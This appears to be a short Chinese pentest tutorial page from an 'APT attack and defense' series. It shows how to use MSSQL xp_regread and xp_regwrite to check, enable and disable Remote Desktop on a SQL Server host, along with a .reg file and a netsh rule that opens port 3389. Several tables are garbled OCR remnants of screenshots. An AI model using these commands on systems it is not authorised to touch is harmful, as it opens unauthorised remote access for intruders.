专注APT攻击与防御 https://micropoor.blogspot.com/

## 1.是否开启远程桌面,1表示关闭,0表示开启

EXEC master..xp\_regread 'HKEY\_LOCAL\_MACHINE', 'SYSTEM\CurrentControlSet\Control\Terminal Server'

,'fDenyTSConnections'

| E | XEC masterxp_regr  | ead ' | HKEY | LOCAL | MAC |
|---|--------------------|-------|------|-------|-----|
|   |                    |       |      |       |     |
|   |                    |       |      |       |     |
|   |                    |       |      |       |     |
|   |                    |       |      |       |     |
|   |                    |       |      |       |     |
|   |                    |       |      |       |     |
|   |                    |       |      |       |     |
|   |                    |       |      |       |     |
|   |                    |       |      |       |     |
|   |                    |       |      |       |     |
| • |                    |       |      |       |     |
|   | Walue              | Data  |      |       | _   |
| 1 | fDenvISConnections | 0     |      |       |     |
| 1 |                    |       |      |       |     |

#### 2.读取远程桌面端口

EXEC master..xp\_regread 'HKEY\_LOCAL\_MACHINE', 'SYSTEM\CurrentControlSet\Control\Terminal

Server\WinStations\RDP-Tcp','PortNumber'

| EXEC | master. | .xp_re | egread | ´HKEY_ | LOCAL | _m2 |
|------|---------|--------|--------|--------|-------|-----|
|      |         |        |        |        |       |     |
|      |         |        |        |        |       |     |
|      |         |        |        |        |       |     |
|      |         |        |        |        |       |     |
|      |         |        |        |        |       |     |
|      |         |        |        |        |       |     |
|      |         |        |        |        |       |     |
|      |         |        |        |        |       |     |
|      |         |        |        |        |       |     |
|      |         |        |        |        |       |     |
|      |         |        |        |        |       |     |
|      |         |        |        |        |       |     |
|      |         |        |        |        |       |     |
|      |         |        |        |        |       |     |
|      |         |        |        |        |       |     |
|      |         |        |        |        |       |     |
|      |         |        |        |        |       |     |
| •    |         |        |        |        |       |     |
| <    | ue      | Data   |        |        |       |     |

### 3.开启远程桌面

EXEC master.dbo.xp\_regwrite'HKEY\_LOCAL\_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG\_DWORD',0;

### reg文件开启远程桌面:

Windows Registry Editor Version 5.00HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]"fDenyTSConnections"=dword:00000000[HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]"PortNumber"=dword:00000d3d

////

保存micropoor.reg,并执行regedit /s micropoor.reg

注:如果第一次开启远程桌面,部分需要配置防火墙规则允许远程端口。

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

# 4.关闭远程桌面

EXEC master.dbo.xp\_regwrite'HKEY\_LOCAL\_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG\_DWORD',1;

• Micropoor